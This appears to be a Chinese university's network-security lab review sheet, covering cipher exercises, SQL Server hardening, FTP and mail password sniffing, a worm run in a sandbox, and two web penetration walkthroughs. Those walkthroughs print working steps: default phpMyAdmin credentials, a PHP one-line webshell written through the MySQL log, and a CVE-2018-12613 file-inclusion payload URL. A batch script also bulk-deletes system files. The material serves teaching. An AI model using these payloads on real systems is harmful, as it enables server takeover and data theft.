网络安全网络安全事件NJUPT 计软院 复习资料

NJUPT 网络安全综合实训

2022-10-25  本文已影响0人  Du1in9

1.1实验: Web站点渗透测试(一)

实验难度: 困难
实验类别: 验证型、创新型
实验目的: 挖掘漏洞, 获得该服务器权限。
实验内容: 对目标靶机进行漏洞挖掘, 获得服务器权限。是否还存在其他漏洞可以获得服务器权限?

一、实验准备
1、根据平台提供的靶机网址访问网站首页, 首页界面如下图所示。



二、实验步骤
1、使用目录扫描器, 对靶机站点进行目录扫描。发现目标站点下存在phpmyadmin目录以及一个info. php的文件。



2、访问info.php文件之后, 发现其内容为php探针。通过php探针的信息, 判断出该站点使用phpstudy搭建, 因为使用phpstudy搭建的站点默认存在该探针文件, 且获得网站的绝对路径为"C:AphpStudy/PHPTutorialwww"。
3、访问phpmyadmin目录, 使用phpstudy 中 mysql的默认密码(root/root)进行登录尝试, 发现登录成功。

4、因为以root权限登录了phpmyadmin且在步骤2已经通过php探针获取到了网站的绝对路径, 所以按下来可以尝试利用日志文件来进行 getshell.首先在sql处执行"SHOW VARIABLES LIKE 'general%'”查看是否开启日志功能以及日志文件的保存路径。
5、日志功能暂未开启。接下来分别执行"set global general_log = "ON";”开启mysql日志功能。
"set global general_log_file=' C://phpStudy//PHPTutorial//www//shell.php';”将日志文件的存储路径改为站点根目录下的shell.php文件。
6、之后再执行sql 语句"select '<?php @eval($_POST[1]);?>", 向日志文件中写入php一句话木马。
7、之后在浏览器中访问mysql日志文件, shell.php, 看到如图所示的界面表示shell写入成功。



8、使用蚁创对webshell 进行连接。

9、实验结束。

1.2实验: Web站点渗透测试(二)

实验难度: 困难
实验类别: 验证型、创新型
实验目的: 挖掘漏洞, 获得该服务器权限。
实验内容: 对目标靶机进行漏洞挖掘, 获得服务器权限。是否还存在其他漏洞可以获得服务器权限?

一、实验准备
1、根据平台提供的靶机网址访问网站首页, 首页界面如下图所示。


二、实验步骤
1、扫描目标站点目录, 发现存在"www.zip"文件和phpmyadmin目录。

2、下载"www.zip"文件, 解压后发现为网址源代码文件。

3、打开config目录下的database.php文件。找到数据库连接的用户名和密码。

4、访问网站的phpmyadmin目录, 使用在源代码中找到的数据库用户名和密码进行登录尝试。
5、登录成功后, 发现phpmyadmin的版本为4.8.1, 这个版本的phpmyadmin存在任意文件包含湯洞(CVE-2018-12613), 参考内容: https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-X-LFI-Exploit/
6、利用CVE-2018-12613 进行getshell.在SQL语句执行处执行<?php file_put_contents('shell.php', '<?php@eval(S_POST[1]): ?>');?> , 这句话的含义为向shell.php文件中写入一句话木马。
7、按F12通过浏览器获取sessionID。

8、包含session文件,在phpmyadmin目录下生成webshell文件。Payload如下:http://183.129.189.59:10076/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/ses sions/sess_[此处为步骤7获取到的sessionID]

9、使用蚁剑对webshell 进行连接。连接成功后,可通过蚁剑对目标网站的文件、数据库等进行操作。

1.3实验:信息安全经典实例(一)

实验难度:中等
实验类别:验证型
实验目的:了解在FAT32文件系统的文件安全擦除原理和方法。
实验内容:实现文件安全擦除,利用finaldata实现文件的工具恢复。

一、实验准备
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机,远程桌面连接,如下图所示。



远程登录。如下图所示。



二、实验步骤
1、打开桌面上的eclipse。
2、在左侧项目中找到“凯撒”,找到并找到MyCaesar.java文件,如下图所示。

3、点击eclipse的运行按钮,执行MyCaesar.java程序。
4、在控制台输入1执行加密,输入2执行解密。这里我们输入1,并按提示输入需要加密的字符串。传统的恺撒加密支持对英文字符的加解密。输入后回车,得到加密后的密文。如下图所示。



5、如果需要继续执行程序,则输入其他任意字符,如果需要退出,则输入0。这里继续执行,输入1,并输入2执行解密程序。如下图所示。

6、输入待解密的密文,回车。这里可输入上一步加密得到的密文。如下图所示。

7、输入0退出程序,实验完成。

1.4实验:信息安全经典实例(一)(设计型)

实验难度:中等
实验类别:设计型
实验目的:掌握恺撒密码原理及实现方式。
实验内容:执行恺撒密码的加解密程序。

一、实验准备
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。远程桌面连接。
2、远程登录。
二、实验步骤
1、打开桌面上的Dev-C++。
2、打开“C++_caesar”文件夹,点击main.cpp。如下图所示。



3、点击Dev-C++的编译运行按钮。按照控制台提示输入参数。如下图所示。



4、实验完成

1.5实验:信息安全经典实例(二)

实验难度:简单
实验类别:验证型
实验目的:掌握维吉尼亚多表代换密码原理及实现方式。
实验内容:执行维吉尼亚密码的加解密程序。

一、实验准备
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。远程桌面连接。
2、远程登录。
二、实验步骤
1、打开桌面上的eclipse。
2、在左侧项目中找到“Vigenera”,找到并找到MyVigenera.java文件,如下图所示。



3、点击eclipse的运行按钮,执行MyCaesar.java程序。
4、在控制台输入1执行加密,输入2执行解密。这里我们输入1,并按提示输入需要加密的字符串。输入密钥字符串,密钥长度需小于明文长度。回车后获得密文。如下图所示。



5、再次运行MyVigenera.java程序,这次选择解密输入刚才加密得到的密文,已经与刚才相同的密钥,如下图所示。

6、实验完成。

1.6实验:信息安全经典实例(二)(设计型)

实验难度:中等
实验类别:设计型
实验目的:掌握维吉尼亚多表代换密码原理及实现方式。
实验内容:执行维吉尼亚密码的加解密程序。

一、实验准备
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。远程桌面连接。
2、远程登录。
二、实验步骤
1、打开桌面上的eclipse。
2、打开“C++_Vigenera”文件夹,找到“in.txt”,在里面输入待加密的明文。然后点击Vigenera项目文件,在Dev-C++中打开项目。如下图所示。




3、点击Dev-C++的编译运行按钮。按照控制台提示输入参数。如下图所示。



4、在“C++_Vigenera”文件夹中找到“out.txt”,即为加密后的密文。

5、如果需要解密,在“in.txt”中写入待解密的密文,运行程序后,在“out.txt”中会生成解密后的明文。
6、实验结束。

1.7实验:信息安全经典实例(三)

实验难度:中等
实验类别:验证型
实验目的:了解SM4密码原理及实现方式,了解分组密码的结构。。
实验内容:执行SM4密码的加解密程序。

一、实验准备
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。远程桌面连接。
2、远程登录。
二、实验步骤
1、打开桌面上的eclipse。
2、在左侧项目中找到SM4->com.hps.test->testmain.java。
3、点击eclipse的运行按钮,执行testmain.java程序。如下图所示。



4、实验完成。

1.8实验:信息安全经典实例(三)(设计型)

实验难度:中等
实验类别:设计型
实验目的:了解SM4密码原理及实现方式,了解分组密码的结构。。
实验内容:执行SM4密码的加解密程序。

一、实验准备
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。远程桌面连接。
2、远程登录。
二、实验步骤
1、打开桌面上的Dev-C++。
2、点击File->Import->fromMSVisualC++project,找到并找到AES.java文件,在弹窗中选择VisualC++project,打开桌面上的“C++_SM4”文件夹中的“TestAESCipher.dsp”文件,最后点击“Import”如下图所示。




3、点击Dev-C++的编译运行按钮。如下图所示。



4、实验完成。

1.9实验:加解密编程(一)

实验难度:中等
实验类别:验证型
实验目的:掌握DES密码原理及实现方式。
实验内容:执行DES密码的加解密程序。

一、实验准备
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。远程桌面连接。
2、远程登录。
二、实验步骤
1、打开桌面上的eclipse。
2、在左侧项目中找到“DES”,找到并找到DES.java文件。
3、点击eclipse的运行按钮,执行DES.java程序。如下图所示。



4、实验完成

1.10实验:加解密编程(一)(设计型)

实验难度:中等
实验类别:设计型
实验目的:掌握DES密码原理及实现方式。
实验内容:执行DES密码的加解密程序。

一、实验准备
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。远程桌面连接。
2、远程登录。
二、实验步骤
1、打开桌面上的Dev-C++。
2、点击File->Import->fromMSVisualC++project,找到并找到AES.java文件,在弹窗中选择VisualC++project,打开桌面上的“C++_DES”文件夹中的“TestAESCipher.dsp”文件,最后点击“Import”如下图所示。





3、点击Dev-C++的编译运行按钮。如下图所示。



4、实验完成。

1.11实验:加解密编程(二)

实验难度:中等
实验类别:验证型
实验目的:掌握AES密码原理及实现方式。
实验内容:执行AES密码的加解密程序。

一、实验准备
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。远程桌面连接。
2、远程登录。
二、实验步骤
1、打开桌面上的eclipse。
2、在左侧项目中找到“AES”,找到并找到AES.java文件。
3、点击eclipse的运行按钮,执行AES.java程序。如下图所示。


4、实验完成。

1.12实验:加解密编程(二)(设计型)

实验难度:中等
实验类别:设计型
实验目的:掌握AES密码原理及实现方式。
实验内容:执行AES密码的加解密程序。

一、实验准备
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。远程桌面连接。
2、远程登录。
二、实验步骤
1、打开桌面上的Dev-C++。
2、点击File->Import->fromMSVisualC++project,找到并找到AES.java文件,在弹窗中选择VisualC++project,打开桌面上的“C++_AES”文件夹中的“TestAESCipher.dsp”文件,最后点击“Import”如下图所示。




3、点击Dev-C++的编译运行按钮。如下图所示。

4、实验结束。

1.13实验:加解密编程(三)

实验难度:中等
实验类别:验证型
实验目的:掌握RSA密码原理及实现方式。
实验内容:执行RSA密码的加解密程序。

一、实验准备
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。远程桌面连接。
2、远程登录。
二、实验步骤
1、打开桌面上的eclipse。
2、在左侧项目中找到“RSA”,找到并找到RSA.java文件。
3、点击eclipse的运行按钮,执行RSA.java程序。如下图所示。



4、实验完成。

1.14实验:加解密编程(三)(设计型)

实验难度:中等
实验类别:设计型
实验目的:掌握RSA密码原理及实现方式。
实验内容:执行RSA密码的加解密程序。

一、实验准备
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。远程桌面连接。
2、远程登录。
二、实验步骤
1、打开桌面上的Dev-C++。
2、打开“C++_RSA”文件夹,打开“C++_rsa.cpp”,点击编译运行按钮。如下图所示。



3、按照控制台提示输入参数。如下图所示。



4、实验完成

1.15实验:SQL Server安全设置(一)

实验难度:简单
实验类别:验证型
实验目的:掌握配置安全的密码策略。
实验内容:对SQL Server 进行安全的密码策略配置,查看数据库日志。

一、实验准备
1、打开本地“远程桌面连接”工具,输入Windows 7虚拟机的IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。远程桌面连接,如下图所示。
2、远程登录,如下图所示。
二、SQL Server安全加固
1、开始->所有程序->Microsoft SQL Server 2008 r2->SQL Server Management Studio,打开SQL
Server 2008。使用Windows身份验证登录。



2、SQL Server数据库的安全威胁。数据库面临着滥用过高权限、滥用合法权限、权限提升、数据库平台漏洞、数据库通信协议漏洞等威胁。



3、常见的安全加固方式。
(1)密码策略由于SQLServer不能更改sa用户名称,也不能删除这个超级用户,所以,必须对这个帐号进行最强的保护,包括使用一个非常强壮的密码、最好不要在数据库应用中使用sa帐号而是新建立一个拥有与sa一样权限的超级用户来管理数据库、同时养成定期修改密码的好习惯。数据库管理员应该定期查看是否有不符合密码要求的帐号。比如使用下面的SQL语句:

(2)数据库日志的记录审核数据库登录事件的“失败和成功”,在实例属性中选择“安全性”,将其中的审核级别选定为全部,这样在数据库系统和操作系统日志里面,就详细记录了所有帐号的登录事件。


4、实验完成。

1.16实验:SQL Server安全设置(二)

实验难度:简单
实验类别:验证型
实验目的:掌握配置安全的账号策略。
实验内容:在SQL Server 上配置安全的账号策略,管理 SQL Server 内置存储过程xp_cmdshell 控制系统, 数据库备份与恢复。

一、实验目标
1、使用账号策略并实现以下目标:
① 确保将“帐户锁定持续时间”设置为“15分钟或更多分钟”
② 确保将“帐户锁定阈值”设置为“10次或更少的无效登录尝试,但不为0”3.确保将“重置帐户锁定计数器”设置为“15分钟或更长时间”。
2、完成Xp_cmdshell配置.
3、完成数据库备份
二、实验准备
使用window下的远程桌面连接进行连接靶机。



连接完成后打开sqlservermanagementstudio使用windows身份验证登录。



三、实验步骤
1、账号策略
打开控制面板——>管理工具——>本地安全策略

选择账户策略中的账户锁定策略并双击账户锁定阈值

输入账户锁定阈值

设置锁定时间和计数器

回到sqlservermanagementstudio中选择新建登录名



输入登录名和密码,勾选强制实施密码策略和强制密码过期

退出sqlservermanagementstudio并重新打开

使用错误的密码尝试五遍,再使用正确的密码。

说明账号安全策略已经实现,因为sql2008是应用windows下的安全策略,所以只需要设置Windows下的安全策略

注:要想解除锁定,重新使用windows身份验证登录查看该登录名的属性状态栏,修改锁定选项即可。
2、配置Xp_cmdshell
右键点击连接后数据库的最上方,选择“方面”。

选择外围应用配置器

将XPCmdShellEnabled选项修改为True

3、Sqlserver数据库备份
(1)数据库整库备份右键数据库点击任务下的备份

选择路径并填入相应参数点击确定即可

备份成功弹出提示框

(2)通过生成脚本的方式单表备份右键数据库点击任务下的生成脚本



点击下一步,可以选择特定的对象或者生成整个数据库脚本

选择生成文件的形式以及保存的目录,如果想同时保存数据,点击高级进行设置

(3)通过Select Into语句将一个表快速备份到一个临时新表中。使用以下语句即可。
Select * Into ABackUp.dbo.Product_0228 FROM A.dbo.Product;

1.17实验:FTP密码嗅探

实验难度:简单
实验类别:验证型
实验目的:嗅探FTP登陆密码。
实验内容:获取FTP帐户密码,主机B远程FTP登录,分析捕获数据包。

一、实验准备
远程登陆windows攻击机和靶机



二、实验步骤
登陆靶机开启wireshark,选择本地连接开始抓包使用攻击机上的winscp远程登陆靶机的FTP服务



在靶机上使用wireshark的过滤器过滤ftp,可以看到明文显示的登陆情况

右键选择追踪流,tcp流,可以看到完整的操作。

1.18实验:OE账户嗅探

实验难度:中等
实验类别:验证型
实验目的:通过实验了解如何进行OE账户嗅探。
实验内容:通过抓包嗅探OE账户。
注意:由于实验环境特殊平台暂不支持,所以仅提供邮件流量包进行分析,以下抓取流量的过程不做要求操作,分析过程可直接使用提供流量包进行分析

实验步骤
1.准备一台电子邮件服务器和一台电子邮件客户机



2.查看服务器与客户机的IP地址



3.在服务器的pop3服务中新建一个test.com域


4.在域中添加两个邮箱,用户名分别为test1和test2,密码均为123123



5.在客户机中打开outlook,添加账户test1与test2接收邮件服务器地址与发送邮件服务器地址都为服务器1的IP地址


6.在客户机中使用账户test1向账户test2发送邮件

7.在客户机中切换账户为test2进行邮件接收,并抓包


8.在切换至账户test2接收邮件时,客户机向服务器发送了test2的邮箱与密码用于登录。

1.19实验:批处理脚本编写与验证蠕虫病毒(一)

实验难度:简单
实验类别:验证型、创新型
实验目的:学习简单的批处理脚本编写
实验内容:编写一个jxz.bat的批处理,有输出用户、网络信息、任务列表、删除垃圾等功能。
请自行美化批处理的输出结果?如何修改最后一步打开的网页?

实验步骤
1、右键桌面新建一个文本文件。如下图所示:



2、右键修改名称为jxz.bat。如下图所示:



3、右键使用notpad++打开。如下图所示:

4、按照如下代码输出:
@echo off
echo ------------------
net user
pause
echo ------------------
tasklist
pause
echo ------------------
ipconfig
pause
eoho ------------------
del /f /s /q %systemdrive %\*.tmp
del /f /s /q %systemdrive %\*._mp
del /f /s /q %systemdrive %\*.log
del /f /s /q %systemdrive %\*.gid
del /f /s /q %systemdrive %\*.chk
del /f /s /q %systemdrive %\*.old
del /f /s /q %systemdrive %\recycled\*.*
del /f /s /q %windir %\*.bak
del /f /s /q %windir %\prefetch\*.*
rd /s /q %windir %\temp & md %windir %\temp
del /f /q %userprofile %\cookies\*.*
del /f /q %userprofile %\recent\*.*
del /f /s /q “%userprofile %\Localsettings\Temporary Internet Files\*.*”
del /f /s /q “%userprofile %\Localsettings\Temp\*.*”
del /f /s /q “%userprofile %\recent\*.*”
pause
eaho ------------------
explorer https://www.baidu.com
pause

5、保存文件。
6、点击Windows开始按钮 ,输入cmd,运行命令窗口。
7、输入cd Desktop回车,切换目录到桌面。如下图所示:



8、输入jxz.bat运行脚本 ,等待完成。如下图所示:





9、完成实验。

1.20实验:批处理脚本编写与验证蠕虫病毒(二)

实验难度:简单
实验类别:验证型、创新型
实验目的:验证一种蠕虫病毒的感染过程
实验内容:运行蠕虫病毒查看行为特征,再利用杀毒软件进行杀毒
该蠕虫病毒使用了什么样的方式来欺骗人们去运行它?
病毒通过什么方式来达到隐藏自身的目的?

一、实验过程
1、启动沙箱sandboxie。如下图所示:


2、将病毒的后缀名改成exe,并且 右键病毒在沙箱中运行。如下图所示:

3、观察过程。如下图所示:

一会之后程序另起了一个进程名称变成了Ybgqgo.exe,进程id也变了

过了一段时间后Ybgqgo.exe停止了自身进程,并且启动了ie游览器,尝试访问特定网页。

由于是虚拟机是断网环境,所以没有进一步的过程了。
4、直接双击运行病毒。

5、启动杀毒软件。如下图所示:

进行病毒查杀。可以看到病毒设置了开机的自动启动,并且使用游览器去访问网页。6、打开游览器访问https://s.threatbook.cn/,将病毒文件上传,观察生成的报告。如下图所示:
上一篇下一篇

猜你喜欢

热点阅读